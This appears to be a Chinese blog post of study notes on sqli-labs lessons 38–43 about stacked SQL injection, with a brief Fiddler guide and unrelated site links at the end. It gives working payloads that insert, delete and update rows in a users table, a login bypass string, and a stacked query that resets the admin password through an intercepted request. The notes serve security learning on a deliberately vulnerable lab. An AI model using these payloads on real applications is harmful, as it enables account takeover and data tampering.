DAY 8

sqli-lab Page-3

sqli-labs lesson 38

  • What is Stacked injection?
    https://blog.csdn.net/Fly_hps/article/details/80288678
  • SQL插入语句: 
    INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);

    或者

    INSERT INTO table_name
VALUES (value1,value2,value3,...);
  • payload构建:?id=1';insert into users values (99,'test','test')--+
  • 注:闭合符号、表名以及字段可以通过之前学习的方法获得。
  • 结果:

sqli-labs lesson 39

  • SQL删除语句:

    DELETE FROM table_name
WHERE some_column=some_value;
  • 跟上一题一样,只不过是数值型的参数,我们用delete语句把上次插入的记录删除
  • payload构建:?id=1;delete from users where id=99--+
  • 结果:

sqli-labs lesson 40

  • SQL更新语句:

    UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
  • 利用联合查询或者盲注获得闭合符号、数据库名、表名、字段名等,更新id=1的密码
  • payload:?id=99') UNION SELECT 1,2,3;update users set password='god' where id=1--+
  • 结果:

sqli-labs lesson 41

  • 跟上一题一样,只不过是数值型注入

sqli-labs lesson 42

  • 万能密码:

    • 用户名:随意
    • 密码:0' or 1=1;#
    • 结果:直接登录id=1的账号
  • Stacked Injection:
    • 抓包:这里用Fiddler
    • 改包:密码改为1';update users set password='test' where username='admin'#
    • 结果:成功更改了admin账号的密码

sqli-labs lesson 43

  • 这一题与上一题一样,闭合符号是’)

Fiddler使用

  • 下载与安装:https://www.telerik.com/fiddler
  • 界面:
  • 抓包:
    • 快捷键F12打开抓包(默认为8888端口),出现该图标即已经打开。
    • 抓包结果在左侧。点击后左侧新增一个记录,打开后可以修改请求。
    • 修改完毕,点击

sqli-labs学习笔记 DAY8的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. JS学习笔记Day8

    一.内置函数Math 1.Math 1)Math.abs() 求绝对值 2)Math.PI 圆周率 2.求近似值: 1)Math.round() 四舍五入(负数: >0.5 进一 <=0. ...

  3. HTML学习笔记Day8

    一.设置元素背景透明属性{background:rgba(255,255,255,0.5):} 1.元素背景透明,内容正常显示: 注:opacity:value:元素背景透明内容也透明: 2.rgba ...

  4. Python学习笔记 - day8 - 异常

    异常 在程序运行过程中,总会遇到各种各样的错误.有的错误是程序编写有问题造成的,比如本来应该输出整数结果输出了字符串,有的错误是用户输入造成的,比如让用户输入email地址,结果得到一个空字符串,这种 ...

  5. 【目录】Python学习笔记

    目录:Python学习笔记 目标:坚持每天学习,每周一篇博文 1. Python学习笔记 - day1 - 概述及安装 2.Python学习笔记 - day2 - PyCharm的基本使用 3.Pyt ...

  6. go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE

    go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE Go语言是谷歌2009发布的专门针对多处理器系统应用程序的编程进行了优化,使用Go编译的程序可以媲美C或C++代码的速 ...

  7. C51学习笔记

    转自:http://blog.csdn.net/gongyuan073/article/details/7856878 单片机C51学习笔记 一,   C51内存结构深度剖析 二,   reg51.头 ...

  8. R语言可视化学习笔记之添加p-value和显著性标记

    R语言可视化学习笔记之添加p-value和显著性标记 http://www.jianshu.com/p/b7274afff14f?from=timeline   上篇文章中提了一下如何通过ggpubr ...

  9. SQLi-Labs学习笔记

    结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言.对于初学者,数据库仅仅是在客户端和服务端进行数据存储.SQL通过结构化查询,关系,面向对象编程等等来管理数据库.编程极客们总是搞出许 ...

随机推荐

  1. Day2 MySql函数以及单表查询

    SQL中的运算符 算术运算符 --算术运算符(子句) ; ; ; ; --0.75 ; --NULL div ; 比较运算符> < >= <= != = --0表示false, ...

  2. no.random.randn

    numpy中有一些常用的用来产生随机数的函数,randn就是其中一个,randn函数位于numpy.random中,函数原型如下: numpy.random.randn(d0, d1, ..., dn ...

  3. 关于Koala 中文编译出错

    关于koala: 我们知道koala是一个前端预处理器语言图形编译工具,支持Less.Sass.Compass.CoffeeScript,帮助web开发者更高效地使用它们进行开发.跨平台运行,完美兼容 ...

  4. c++——初始化列表

    多个对象构造和析构 1对象初始化列表 1)对象初始化列表出现原因 1.必须这样做: 如果我们有一个类成员,它本身是一个类或者是一个结构,而且这个成员它只有一个带参数的构造函数,没有默认构造函数.这时要 ...

  5. Angular动态表单生成(八)

    动态表单生成之拖拽生成表单(下) 我们的动态表单,最终要实现的效果与Form.io的在线生成表单的效果类似,可以参考它的demo地址:https://codepen.io/travist/full/x ...

  6. 图片在线处理 webp!

    之前处理图片的方式是,小图标通过gulp配置的spritesmith雪碧图方式,.png会先用ps工具转成.jpg,然后jpg太大则用在线压缩工具来进行压缩(另外gulp系列的gulp-imagemi ...

  7. 【CSS3】特殊的属性归纳(一)

    CSS3手册地址速查表 -webkit- 最终要用兼容性写法 (一)-webkit-tap-highlight-color    (mobile移动设备私有属性) 案列: 问题:遇到a链接和butto ...

  8. 【LeetCode371】 Sum of Two Integers

    题目描述: 解题思路: 此题是要在不用操作符+和-的情况下,求两个整数的和.既然不能用内置的加减法,那就只能用位运算(&, |, ~, ^). (1)异或(xor):异或的数学符号为“⊕”,计 ...

  9. js随笔记录

     1.当我们尝试优化一段程序的时候,必须要同时了解语言本身和运行环境就比如说,可能教科书上写移位操作比乘法运算要快,但是这是因为CPU指令的问题,所以对于C语言成立,对于跑在VM上的语言来说则不一定了 ...

  10. (oralce)pga_aggregate_target与workarea_size_policy相互关系验证

    pga_aggregate_target与workarea_size_policy相互关系验证 先放上结论: 1. 当pga_aggregate_target设置为非0, 手工设置(workarea ...